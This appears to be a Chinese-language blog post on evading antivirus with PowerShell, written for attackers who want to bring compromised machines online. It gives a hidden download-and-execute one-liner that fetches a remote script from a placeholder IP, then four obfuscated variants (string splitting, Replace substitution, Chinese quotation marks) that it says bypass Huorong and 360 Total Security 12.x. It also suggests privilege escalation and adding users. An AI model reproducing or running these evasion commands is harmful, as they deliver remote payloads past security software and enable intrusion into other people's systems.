0x00 前言
之前文章写了一点免杀方面的知识,主要包括了C/C++、python
语言的免杀思路。之前文章写的时候,360安全卫士是12版本,可能由于最近的某项活动,现在360升级13版本,规则做了更改,可能有些思路已经无法实现,这篇文章主要讲解一些powershell
方面的免杀知识。
0x01 PowerShell 简介
Windows PowerShell
是一个命令行管理程序,相比较于CMD
命令行,它更为强大,同时,它又是一种脚本语言,为系统管理设计。在.NET Framework
的基础上构建,简单来说,可以类比UNIX
系统的脚本(shell)。
2002年,微软研究了一个新的产品Monad
,在2005年发布第一个版本,到2006年被重命名为Windows PowerShell
,目前微软官网文档,已经更新到7.2版本,第一款默认集成PowerShell
的系统版本是Windows Server 2008
。
0x02 PowerShell 免杀
上一部分提到,Windows PowerShell
是一种脚本语言,那么通过这种语言,可以完成很多系统管理操作,同时也为攻击者提供了一种利用思路。
现在利用思路大都是利用其实现与远端IP
进行通信,利用其传递木马执行实现肉鸡上线。其最主要优点就是,无文件落地,痕迹只存在于内存进程之中,隐蔽性较强。
#PowerShell 下载执行
powershell.exe -nop -w hidden -c "IEX((new-object net.webclient).downloadstring('http://XX.XX.XX.XX/1.ps1'))"
当然,像这种明目张胆通过公网IP地址下载并执行木马脚本,肯定会被杀毒软件所拦截。目前杀软对PowerShell
中的参数和函数进行监测,我们可以通过逐个拆分进行探测杀软监测规则。
通过上图可以发现,火绒对hidden
参数进行了监测。以此类推,逐个排查,对PowerShell
语句进行改进、变换、拼接等操作,实现免杀。
0x03 干货分享
接下来分享一些可绕过最新版本火绒,以及360安全卫士12.X版本的PowerShell
语句。
# 拆分DownloadString函数 + echo 过最新版火绒 + 360 12.X版本
cmd /c echo $c1='IEX(New-Object Net.WebClient).Downlo';$c2='123(''http://XX.XX.XX.XX/test.ps1'')'.Replace('123','adString');IEX ($c1+$c2) | powershell -
# 拆分http关键字,过360 12.X版本
powershell "$a='IEX((New-Object Net.WebClient).DownloadString(''ht';$b='tp://XX.XX.XX.XX/test.ps1''))';IEX ($a+$b)"
#通过中文引号,绕过360 12.X版本
powershell "IEX ((new-object net.webclient).downloadstring('ht‘+’tp://XX.XX.XX.XX/test.ps1'))"
# 替换IEX + http拆分 绕过最新版火绒
powershell "$a='123((New-Object Net.WebClient).DownloadString(''ht'.Replace('123','IEX');$b='tp://XX.XX.XX.XX/test.ps1''))';IEX ($a+$b)"
以上只是我在写这篇文章的时候,随手测试的几种绕过方式,其实绕过方式还有很多很多,只要自己肯去排列组合各种可能性,可能大家都能达到免杀效果。只是通过上面的几个实例和大家探讨一下基本的PowerShell
免杀思路。
而且PowerShell
不仅仅可以做到木马执行上线CS
操作,还可以做提权、加用户等利用方式,有兴趣的可以自己探索一下。
0x04 总结
关于PowerShell
有很多的利用方式,我也是在别人的基础上去慢慢摸索,要学的东西还很多,不懂的东西还是太多,以上实例,只测试火绒/360安全卫士,其他杀毒软件未做测试。
关于360安全卫士13.X版本
,太难了可能是因为最近的全国性质活动,竟然不允许以任何形式调用PowerShell
,系统最高权限去启用PowerShell
也是默认禁止。可能有别的方法去启动吧?目前没有探索出来,时间还是太仓促,可能就在自己的知识盲区里面,慢慢再研究吧。
作者: Mr-hello
介绍: 免杀,一个老生常谈的领域,但是当你真正了解之后,你会发现想要入门其实也还算容易。但是真正有所成就还是需要下一番功夫。